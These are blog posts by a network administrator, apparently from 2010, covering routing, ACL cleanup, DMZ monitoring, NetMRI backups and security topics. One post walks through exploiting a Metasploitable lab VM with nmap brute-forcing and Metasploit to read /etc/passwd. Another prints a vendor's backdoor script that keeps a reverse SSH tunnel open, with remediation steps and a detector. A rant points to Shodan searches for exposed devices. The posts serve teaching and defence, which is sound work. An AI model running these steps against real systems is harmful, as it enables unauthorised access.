    Below is the relevant output from R2, which shows that R2 is not using the EIGRP-learned routes to 222.102.23.0/24 and 198.200.230.0/24, but the OSPF and RIP routes instead.   As mentioned earlier, the requirement for this scenario is that R2 use the EIGRP routes originated from R0, since they are the primary source.  In Part 2, I’ll go through the configuration added on R2 to make that happen.  If you do have ideas flowing through your head, please feel free to post your comment.

    Until Next Time (AJ)


    R2#sh ip route 222.102.23.1
    Routing entry for 222.102.23.0/24
    Known via "rip", distance 120, metric 1
    Redistributing via rip
    Last update from 172.19.200.2 on FastEthernet1/0, 00:00:11 ago
    Routing Descriptor Blocks:
    * 172.19.200.2, from 172.19.200.2, 00:00:11 ago, via FastEthernet1/0
    Route metric is 1, traffic share count is 1
    R2#sh ip route 198.200.230.0
    Routing entry for 198.200.230.0/24
    Known via "ospf 100", distance 110, metric 20, type extern 2, forward metric 1
    Redistributing via eigrp 200
    Advertised by eigrp 200 metric 1 1 1 1 1
    Last update from 172.19.200.3 on FastEthernet1/0, 1d02h ago
    Routing Descriptor Blocks:
    * 172.19.200.3, from 172.19.200.3, 1d02h ago, via FastEthernet1/0
    Route metric is 20, traffic share count is 1
    R2#sh ip eigrp topology 222.102.23.0/24
    IP-EIGRP (AS 200): Topology entry for 222.102.23.0/24
    State is Passive, Query origin flag is 1, 0 Successor(s), FD is 4294967295
    Routing Descriptor Blocks:
    10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
    Composite metric is (2560002816/2560000256), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 110 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 1
    External data:
    Originating router is 172.32.27.1
    AS number of route is 65001
    External protocol is BGP, external metric is 0
    Administrator tag is 65000 (0x0000FDE8)
    R2#sh ip eigrp topology 198.200.230.0/24
    IP-EIGRP (AS 200): Topology entry for 198.200.230.0/24
    State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560000256
    Routing Descriptor Blocks:
    172.19.200.3, from Redistributed, Send flag is 0x0
    Composite metric is (2560000256/0), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 10 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 0
    External data:
    Originating router is 192.168.20.2 (this system)
    AS number of route is 100
    External protocol is OSPF, external metric is 20
    Administrator tag is 0 (0x00000000)
    10.146.12.4 (FastEthernet0/0), from 10.146.12.4, Send flag is 0x0
    Composite metric is (2560002816/2560000256), Route is External
    Vector metric:
    Minimum bandwidth is 1 Kbit
    Total delay is 110 microseconds
    Reliability is 1/255
    Load is 1/255
    Minimum MTU is 1
    Hop count is 1
    External data:
    Originating router is 172.32.27.1
    AS number of route is 65001
    External protocol is BGP, external metric is 0
    Administrator tag is 65000 (0x0000FDE8)
    R2#

    +++++++ R1
    R1#sh ip route eigrp
    172.19.0.0/24 is subnetted, 1 subnets
    D EX 172.19.200.0 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    11.0.0.0/32 is subnetted, 1 subnets
    D EX 11.12.13.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    14.0.0.0/32 is subnetted, 1 subnets
    D EX 14.15.16.1 [170/2560002816] via 10.146.12.5, 1d02h, FastEthernet0/0
    R1#sh ip bgp neighbors 10.146.12.2 advertised-routes | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 172.32.27.0/24 0.0.0.0 0 32768 i



    Jul 09 2010

    Cleaning up your access list

    As a network admin you soon realize that after a few months of adding various ACL rules there comes a time when you need to go back and consolidate them before things get out of hand.

    Now that most cloud providers are moving away from the traditional TCP ports (80, 443) towards non-standard ones (8800, 3995), your job as a network admin requires a bit more planning.

    Normally, if I got a call that a user is unable to access a certain website, I would first verify whether it's a “URL filtering” issue or a “firewall” access issue. If I determined that it's the latter, I would then write a typical ACL and grant the user access after the requested service has been tested.

    For instance if you receive a call about not being able to access a website X on port 5454, you can write a basic ACL rule:

    access-list external_access extended permit tcp 192.168.10.5 255.255.255.0 69.196.224.24 255.255.255.0 eq 5454

    Now the above rule would work just fine, but think about it: if you receive 10-15 of those requests a day, your firewall config will be a mess after a while. The way to take care of this is by using network objects and groups in a rule.

    Network objects let you predefine host and network IP addresses so that you can streamline subsequent configuration. When you configure the security policy, such as an access rule or an AAA rule, you can choose these predefined addresses instead of typing them in manually. Moreover, if you change the definition of an object, the change is inherited automatically by any rules using the object.

    Below is how you would accomplish this if you received, say, three requests for web-related access, all on different ports:

    ======================================
    Creating object groups and adding ports on a Cisco ASA firewall
    ======================================

    config t
    object-group service External_Access tcp
    description Access to external websites
    port-object eq 7778
    port-object eq 5454
    port-object eq 3322

    object-group network External_Access_Users
    description Hosts allowed to reach external websites
    network-object host 192.168.10.5
    network-object host 192.168.10.7
    network-object host 192.168.10.9

    =======================================
    Creating the ACL and applying the object groups
    ========================================
    access-list acl_inside remark ***** External Websites Access *****
    access-list acl_inside extended permit tcp object-group External_Access_Users any object-group External_Access

    Now the next time you receive a request for external website access on a non-standard port, you simply add the port to the service group and the host IP to the network group, and you are set. That's much easier on the eyes!
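    As an added example (not from the original post), here is a Python helper that parses flat ASA extended ACEs like the one above, regroups them into object-groups the way the post does, and also reports which host/port combinations the grouped rule permits that no flat entry did. The ACL lines and the External_Access naming are constructed for the sample.

```python
from collections import defaultdict

# Constructed sample of the flat "one ACE per request" lines the post describes, all to
# the same destination (any), plus one UDP line to show that grouping is per protocol.
FLAT_ACL = """\
access-list acl_inside extended permit tcp host 192.168.10.5 any eq 7778
access-list acl_inside extended permit tcp host 192.168.10.7 any eq 5454
access-list acl_inside extended permit tcp host 192.168.10.9 any eq 3322
access-list acl_inside extended permit tcp host 192.168.10.5 any eq 5454
access-list acl_inside extended permit udp host 192.168.10.5 any eq 514
""".splitlines()


def parse_ace(line):
    """Parse one extended ACE that ends in 'eq <port>'; return None for anything else."""
    tok = line.split()
    if len(tok) < 8 or tok[0] != "access-list" or tok[2] != "extended":
        return None
    rest = tok[5:]

    def take_addr():   # 'any', 'host A' or 'A MASK'
        return rest.pop(0) if rest[0] == "any" else " ".join((rest.pop(0), rest.pop(0)))

    try:
        src, dst = take_addr(), take_addr()
    except IndexError:
        return None
    if len(rest) != 2 or rest[0] != "eq":
        return None
    return dict(acl=tok[1], action=tok[3], proto=tok[4], src=src, dst=dst, port=rest[1])


def _group(lines):
    """Bucket ACEs by (acl, action, proto, dst) and remember every original (src, port) pair."""
    original, groups = set(), defaultdict(lambda: (set(), set()))
    for ace in filter(None, map(parse_ace, lines)):
        key = (ace["acl"], ace["action"], ace["proto"], ace["dst"])
        original.add(key + (ace["src"], ace["port"]))
        groups[key][0].add(ace["src"])
        groups[key][1].add(ace["port"])
    return original, groups


def consolidate(lines, prefix="External_Access"):
    """Emit service/network object-groups and a single ACE per bucket, ASA style."""
    out = []
    for i, ((acl, action, proto, dst), (srcs, ports)) in enumerate(sorted(_group(lines)[1].items()), 1):
        svc, net = f"{prefix}_{proto}_{i}", f"{prefix}_Users_{i}"
        out.append(f"object-group service {svc} {proto}")
        out += [f" port-object eq {p}" for p in sorted(ports)]
        out.append(f"object-group network {net}")
        out += [f" network-object {s}" for s in sorted(srcs)]   # 'any' sources are not valid here
        out.append(f"access-list {acl} extended {action} {proto} object-group {net} {dst} object-group {svc}")
    return out


def widened(lines):
    """(acl, action, proto, dst, src, port) tuples the grouped ACE permits that no flat ACE did."""
    original, groups = _group(lines)
    return {key + (s, p) for key, (srcs, ports) in groups.items()
            for s in srcs for p in ports if key + (s, p) not in original}
```

    Print "\n".join(consolidate(FLAT_ACL)) to get the paste-ready config; an object-group rule permits every listed host to every listed port, so review widened(FLAT_ACL) before the flat entries are removed.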

    If you have another way of achieving the same outcome, don’t hesitate to leave a comment; in the end it's all about learning.

    Jun 07 2010

    Taking the stress out of demoing with Metasploitable

    Back in late May I was preparing for a presentation and while trying to figure out if I should do a live demo or show screen-shots, I noticed a tweet from HDMoore announcing the release of “Metasploitable”.

    According to the Metasploit blog, Metasploitable is an Ubuntu 8.04 server install on a VMware 6.5 image. A number of vulnerable packages are included, including an install of Tomcat 5.5 (with weak credentials), distcc, TikiWiki, TWiki, and an older MySQL. Now you might ask yourself why this is important: who wants a system that is easily hackable? The answer is simple: if you are doing exploit development or pentesting, or just want to practice your kung fu, and need a platform to test on, then Metasploitable is the answer.

    In my case I needed to do a demo, and instead of configuring a vulnerable system I simply downloaded the torrent, loaded it up into my VMware Player and I was set to go. At first I was having a hard time finding people to seed the torrent; however, after I visited the PaulDotCom IRC room and spoke with Mubix, a few minutes later I had about 20 people seeding.

    You should read the entire blog posting to really get a feel for some of the things you can do with Metasploitable. Keeping with the theme from my last blog post “So easy, even A Script Kiddie can do it” I will attempt to attack this VM using simple but effective methods.

    Step One “Nmap Scan”:

    The first scan I ran was nmap -A, which enables OS detection, version detection, script scanning and traceroute. Once I had an idea of what I was dealing with, I then proceeded to run nmap 192.168.126.128 --script=smb-brute.nse. This script tries to brute-force logins on the host and reports any successful credentials. In this case those credentials were msfadmin/msfadmin and user/user.

    Fig-1 Nmap --script=smb-brute.nse

    Step two “Fast-Track Metasploit Autopwnage”:

    Quoted from the Fast-Track program page: Metasploit Autopwn is a feature within Metasploit that is rich with different options. Autopwn allows you to Nmap scan a host and automatically run exploits against the open ports on the system. So to break it down in simplistic terms, a port scan is run against multiple hosts or one target; once those ports have been identified, Metasploit will pull what exploits it has for those open ports, which may be 0 or may be 30. Those exploits are then launched against the system you scanned. It’s really a brute force of exploits; it doesn’t know what version is being run on the system, it just blindly launches a ton of exploits at the system.

    After running the exploit brute force against the Metasploitable VM I was able to successfully exploit the system and got a session; however, I was not able to interact with this session. That being said, I was 50% there: I now had a working exploit I could use manually with Metasploit, choosing a payload of my liking to gain shell access.

    Fig-2 Fast-Track menu, “choose option 2”

    Fig-3 Fast-Track “successfully found an exploit”

    Step three “Using Metasploit”:

    At this stage we already have a working exploit that Fast-Track discovered above, so it's time to use that exploit with a payload of our choosing. I am using the BackTrack 4 final release, since the idea is to use the simplest tools possible instead of installing and configuring anything; also, my Metasploitable IP address in this example is 192.168.126.128.

    cd /pentest/exploit/framework3
    msfconsole

    msf > svn update
    msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec
    msf exploit(tikiwiki_graph_formula_exec) > set RHOST 192.168.126.128
    msf exploit(tikiwiki_graph_formula_exec) > set RPORT 80
    msf exploit(tikiwiki_graph_formula_exec) > set PAYLOAD cmd/unix/generic
    msf exploit(tikiwiki_graph_formula_exec) > set CMD 'cat /etc/passwd'
    msf exploit(tikiwiki_graph_formula_exec) > exploit

    The end result will be a screen display of the password file, which you can run through your favorite password cracker and have fun with the results.

    Fig-4 cat /etc/passwd

    Lastly, you can also connect to the host via http://hostname/tikiwiki/tiki-index.php and log in with admin/admin, which is usually on my list of default passwords to try. So in short, these are just a few simple techniques you can try during your demo to bring some real-world examples instead of just giving a slide show to your audience.

    References:

    http://blog.metasploit.com/2010/05/introducing-metasploitable.html

    http://www.offensive-security.com/metasploit-unleashed/Fast-Track-Modes

    May 26 2010

    “Cybercrime” so easy, even A Script Kiddie can do it

    Disclaimer: I am not an information security professional or someone who has all the answers. Instead I am just an admin who finds infosec interesting and tries to learn whatever I can while commenting on things along the way.

    While working on a demo for a presentation titled “Cracking, the script kiddie way”, I started thinking about how easy it is to fall into a life of cybercrime. I feel this way because there are way too many “low hanging fruits” out there just waiting to be picked. People are constantly misconfiguring their systems or infrastructure devices, thus adding to the number of systems that can be accessed via the Internet with default credentials or in some cases no credentials at all.

    Point # 1: Shodan

    I first heard about Shodan on Twitter, and then shortly after on the PaulDotCom Security Weekly podcast. After those two introductions I still didn’t find the time to truly appreciate Shodan until I saw a presentation by Michael “theprez98” Schearer.

    Once I saw that, I went out and started searching Shodan using a few of his queries, and sure enough I was able to view several routers, switches and firewalls without needing any credentials. Now with a bit of imagination you can get really creative with these devices.

    Fig-1 Shodan search query

    Figure-2   Firewall Access No Credentials

    Figure-3 Switch access no credentials

    Point #2 :Google Hacking (Query FU)

    As many of you already know, once something is on the Internet it's there forever; even if you delete it, you can still find it cached somewhere. With that being said, with the right search queries you can find credit card numbers, social security numbers, usernames, passwords; just think about it and you can probably find it out there.

    The most recent query that made its way to Twitter was a posting over at paste-it.net, where someone submitted tons of credit card numbers, complete with full names and home addresses.

    Figure-4 Credit Card numbers

    Need I say more? With just these few simple examples you can see how easy it is for someone to sit at home and become a criminal overnight if they so choose. Just think about it: if I am already a criminal, would I want to go out and rob someone with a gun, or stay at home in my underwear and steal their identity, or just trade their bank information online for easy money?

    I am not saying that we should all go out and do this; I just think too many times we think it's OK to leave our systems poorly secured because we think we are not a valuable target, but just keep in mind that someone can always use your network as a pivot point to further their cause.

    OK, my rant is over, now let's go out there and secure something!

    Reference Links

    http://www.shodanhq.com/help/videos

    http://pauldotcom.com/wiki/index.php/Episode177

    http://www.hackersforcharity.org/ghdb/

    May 19 2010

    DMZ does not stand for Don't Monitor Zone

    Too many times we tend to deploy a DMZ host and then just forget about it: we tend not to apply security patches or software updates, or even set up any form of monitoring. By contrast, we spend most of our effort monitoring and analyzing our internal network.

    I am aware that many factors such as manpower, budgeting or other things can affect this decision. Don’t get me wrong, I am not choosing one side over the other; I just think we should place an equal amount of importance on both. I was faced with the same challenges until I had a chat with Mick, http://twitter.com/bettersafetynet.

    I will be showing how you can start monitoring your DMZ servers by simply installing Splunk (the free version, of course) and the Snare event log forwarder for Windows. The idea is simple: just follow this link to get Splunk up and running, then install Snare by following the instructions in the manual over at http://www.intersectalliance.com/projects/SnareWindows/.

    From here you just have to point your Snare client to your Splunk box and let the monitoring begin.

    Testing:

    After you finish your deployment, the next thing you want to do is fire off a few test alerts so you can become familiar with the results. To achieve this I logged into one of the servers that I am monitoring, restarted a few services, launched cmd.exe, and ran a few commands. The commands and results are displayed below.

    Fig1 Restarting Apache web server.

    Fig2 Splunk Output

    Fig3 Launching cmd.exe and executing a few commands

    Fig4 Splunk Output

    As you can see from the above example, the event logs that are being forwarded to Splunk can serve as a good source for tracking any potential compromise. Offloading your event logs to another server can come in handy if someone tries to cover their tracks by wiping the logs.
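    As an added example (not part of the original post), the following Python checks forwarded events for the two things the test above produces: a service restart and a cmd.exe launch. The tab-separated Snare line layout, the host name dmzweb01 and the event text are constructed assumptions about the agent's format, not output captured from the post's setup.

```python
import re

# Constructed Snare-for-Windows style lines. The tab-separated layout (host, "MSWinEventLog",
# criticality, log, counter, time, event id, source, user, SID type, type, computer, category,
# message) is an assumption about the agent's syslog format, not taken from the post.
def row(log, counter, when, eid, source, user, kind, category, message):
    """Build one constructed Snare line for the sample below."""
    sid_type = "N/A" if user == "N/A" else "User"
    return "\t".join(["dmzweb01", "MSWinEventLog", "1", log, counter, when, eid, source,
                      user, sid_type, kind, "DMZWEB01", category, message])

SAMPLE = [
    row("System", "512", "Wed May 19 10:02:11 2010", "7036", "Service Control Manager", "N/A",
        "Information", "None", "The Apache2.2 service entered the stopped state."),
    row("System", "513", "Wed May 19 10:02:14 2010", "7036", "Service Control Manager", "N/A",
        "Information", "None", "The Apache2.2 service entered the running state."),
    row("Security", "514", "Wed May 19 10:05:40 2010", "592", "Security", "admin", "Success Audit",
        "Detailed Tracking", "A new process has been created: New Process ID: 2520 "
        "Image File Name: C:\\WINDOWS\\system32\\cmd.exe Creator Process ID: 1780 User Name: admin"),
    row("Security", "515", "Wed May 19 10:05:41 2010", "592", "Security", "admin", "Success Audit",
        "Detailed Tracking", "A new process has been created: New Process ID: 2544 "
        "Image File Name: C:\\WINDOWS\\system32\\ipconfig.exe Creator Process ID: 2520 User Name: admin"),
]

FIELDS = ["host", "tag", "criticality", "log", "counter", "time", "event_id", "source",
          "user", "sid_type", "type", "computer", "category", "message"]
SERVICE_RE = re.compile(r"The (.+?) service entered the (\w+) state")
PROCESS_RE = re.compile(r"(?:Image File Name|New Process Name):\s*(\S+)")   # 592 (2003) / 4688 (2008+)


def parse_snare(line):
    """Map one tab-separated Snare line onto FIELDS; None if it is not a Windows event."""
    parts = line.rstrip("\r\n").split("\t")
    if len(parts) < len(FIELDS) or parts[1] != "MSWinEventLog":
        return None
    return dict(zip(FIELDS, parts))


def detect(lines, watched=("cmd.exe", "powershell.exe")):
    """Return (host, what, detail) for service restarts and launches of watched shells."""
    findings, stopped = [], {}   # stopped: service name -> time of its stop event
    for ev in filter(None, map(parse_snare, lines)):
        eid, msg = ev["event_id"], ev["message"]
        if eid == "7036" and (m := SERVICE_RE.search(msg)):
            svc, state = m.groups()
            if state == "stopped":
                stopped[svc] = ev["time"]
            elif state == "running" and svc in stopped:
                findings.append((ev["host"], "service restarted",
                                 f"{svc} stopped {stopped.pop(svc)}, running {ev['time']}"))
        elif eid in ("592", "4688") and (m := PROCESS_RE.search(msg)):
            image = m.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower()
            if image in watched:
                findings.append((ev["host"], "shell launched", f"{image} by {ev['user']}"))
    return findings
```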

    So start monitoring and have fun with it!

    May 13 2010

    Keeping an eye on your vendors

    While talking to a vendor of ours in response to an issue, the vendor said to me, “I just logged in and everything looked OK”. Now those should be comforting words, but for me that just set off a lot of loud bells and whistles. Why, you might ask?

    Our network is set up more or less like any other network, in the sense that we have a perimeter firewall that only allows certain ports inbound and outbound, in conjunction with your average ACL and NAT rules.

    Now for the vendor to be able to login to our network I would have needed to create a NAT rule, and do some port forwarding then provide him with the public IP address that I used in the NAT.

    However, I did not do any of the above and the vendor still had a way into our network. My first instinct was that they had left a “backdoor” on their appliance and were doing some type of reverse tunneling.

    After contacting the vendor and getting some help from mmiller over at irc.freenode.net #pauldotcom, I was able to fully understand what was being done. Below is the little script that was allowing this to happen; it was placed in /etc/init.d/.

    Discovery:

    #!/bin/bash
    # /etc/init.d/setup_tunnel as found on the vendor appliance
    SERVICE_CODE=1122
    CUSTOMER_NAME=bob
    RUSER=${CUSTOMER_NAME}${SERVICE_CODE}   # account on the vendor's server, e.g. bob1122
    PORT=${SERVICE_CODE}0                   # port opened on the vendor's server
    while :; do
        # if no ssh session to the vendor is up, start one that forwards $PORT on the
        # vendor's server back to this appliance's own sshd (a reverse tunnel)
        ps auwx | grep "[s]sh.*${RUSER}@vendordomain.com" >/dev/null ||
            ssh -f -N ${RUSER}@vendordomain.com -p 222 -R $PORT:localhost:22
        sleep 10
    done

    And after running ps -ef and ps aux I was able to confirm the tunnel:

    adminuser     15347     1  0 01:19 ?        00:00:00 ssh -f -N bob1122@vendordomain.com -p 222 -R 1029:localhost:22

    adminuser     5236     1  0  01:19 ?        00:00:10 /bin/bash /etc/init.d/setup_tunnel

    Basically the appliance was connecting to their corporate server, and from there they were able to connect to our network via SSH to manage their appliance.

    Remediation:

    1. I edited the startup file and took out the line for port forwarding.
    2. Changed the vendor-configured passwords.
    3. Placed the appliance in a separate VLAN and added it to our internal monitoring system.
    4. Blocked port 222 outbound.
    5. Double-checked the various cron jobs to see what was scheduled to run on the system.
    6. Informed the vendor to make us aware of this kind of thing in the future, and going forward not to do it again :) .

    In the end this was a real eye opener and going forward I have a new mindset when it comes to vendor devices that have to live on our network. Hoping to get some comments on this one about how others segment vendor appliances on their network.
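    The kind of check that would have caught this tunnel, as an added example that is not from the original post: a Python parser for ps aux output that flags ssh processes carrying -R reverse forwards and explains why each matters. The process rows are constructed, modelled on the listing above; backup.internal and 203.0.113.7 are placeholder hosts.

```python
import shlex

# Constructed 'ps aux' rows modelled on the post's listing, plus a benign local forward and
# a reverse tunnel whose listener binds to all interfaces on the remote side.
PS_OUTPUT = """\
adminuser 15347  0.0  0.2  4244 1980 ?   Ss   01:19 0:00 ssh -f -N bob1122@vendordomain.com -p 222 -R 1029:localhost:22
backup     2201  0.0  0.5 20040 5100 ?   S    01:20 0:00 ssh -N -L 5432:db.internal:5432 backup@backup.internal
root       3010  0.0  0.1  3900 1600 ?   S    01:21 0:00 ssh -fN -R 0.0.0.0:8022:localhost:22 ops@203.0.113.7
""".splitlines()

ARG_OPTS = set("bBcDEeFIiJLlmOopQRSWw")   # single-letter ssh options that take a value


def parse_forward(spec):
    """Split '[bind:]port:host:hostport' (IPv4/hostname form only) into its parts."""
    head, host, hostport = spec.rsplit(":", 2)
    bind, _, port = head.rpartition(":")
    return {"bind": bind, "port": port, "host": host, "hostport": hostport}


def parse_ssh(argv):
    """Extract destination, port, flags and -R forwards from an ssh argv; None if not ssh."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return None
    info, i = {"dest": None, "port": "22", "flags": set(), "reverse": []}, 1
    while i < len(argv):
        a = argv[i]
        if a.startswith("-") and len(a) > 1:
            for j, opt in enumerate(a[1:], 1):
                if opt not in ARG_OPTS:          # plain flag, possibly clustered as in -fN
                    info["flags"].add(opt)
                    continue
                val = a[j + 1:] or argv[i + 1]   # '-p222' or '-p 222'
                i += 0 if a[j + 1:] else 1
                if opt == "p":
                    info["port"] = val
                elif opt == "R":
                    info["reverse"].append(parse_forward(val))
                break
        elif info["dest"] is None:
            info["dest"] = a.rpartition("@")[2]  # user@host -> host
        i += 1
    return info


def find_reverse_tunnels(ps_lines):
    """Flag ssh processes that open reverse (-R) forwards and say why each one matters."""
    findings = []
    for line in ps_lines:
        cols = line.split(None, 10)              # column 11 onward is the command line
        info = parse_ssh(shlex.split(cols[10])) if len(cols) > 10 else None
        if not info or not info["reverse"]:
            continue
        checks = [
            (True, f"reverse forward reaches back through {info['dest']}"),
            ({"f", "N"} <= info["flags"], "backgrounded with no remote command (persistent tunnel)"),
            (info["port"] != "22", f"non-standard ssh port {info['port']}"),
            (any(f["bind"] not in ("", "localhost", "127.0.0.1") for f in info["reverse"]),
             "listener bound to a non-loopback address on the remote side")]
        findings.append({"pid": cols[1], "user": cols[0], "dest": info["dest"],
                         "forwards": [f"{f['port']} -> {f['host']}:{f['hostport']}" for f in info["reverse"]],
                         "reasons": [msg for hit, msg in checks if hit]})
    return findings
```

    Feed it the output of ps aux on a box you manage; an appliance that should only accept inbound management has no business appearing in the result.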

    Additional reading

    https://help.ubuntu.com/community/CronHowto

    http://tldp.org/LDP/Bash-Beginners-Guide/html/sect_09_02.html

    http://www.howtoforge.com/reverse-ssh-tunneling

    Apr 22 2010

    NetMRI Configuration Management

    Below are the steps needed to back up the configuration of a router or switch using the NetMRI appliance. Steps 1-4 are the starting point for executing any job via the configuration manager; other scripts might require a few more steps.

    1. Log into the NetMRI appliance at http://netmri
    2. Click on the “Configuration Management” tab
    3. Click on the “Job Management” sub-tab on the left, then select the “Scripts” tab; the script to back up the IOS config is called “Backup IOS Config”.
    4. Before you execute this you have to decide whether you want to create a scheduled job or just run the job right now. If you choose to run the job right now, follow the steps below:
      1. Click on the “Run Now” action
      2. Select the devices that you would like to back up, either by choosing the group “routing/switching” under the “Device Groups” tab (Option A) or by selecting one or more devices from the “Devices” tab (Option B), then select the “Run” button.

        Option A: choose the “routing/switching” device group.

        Option B: click on the “Devices” tab and manually select the devices that you would like the script to target.

    5. Lastly, enter the name/IP address of the TFTP server that you would like to back up the config files to, and press OK.

      Click OK to proceed!

    6. Once the job has completed you may see a red X in the status tab and an error message indicating that one or more jobs have not been processed.

    Just click on the job name, then the “Details” tab, and look for the device that has the error. You can then click on the “error” link for further details as to why the job did not run on the device in question.

    Next, click on the status log tab to look at the detailed error; in this case the NetMRI appliance was unable to connect to SW02 via SSH, since this switch does not support SSH.

    Note:

    You can also schedule these jobs instead of running them manually. Have fun, and remember to back up your configs, because you never know when you will need them.
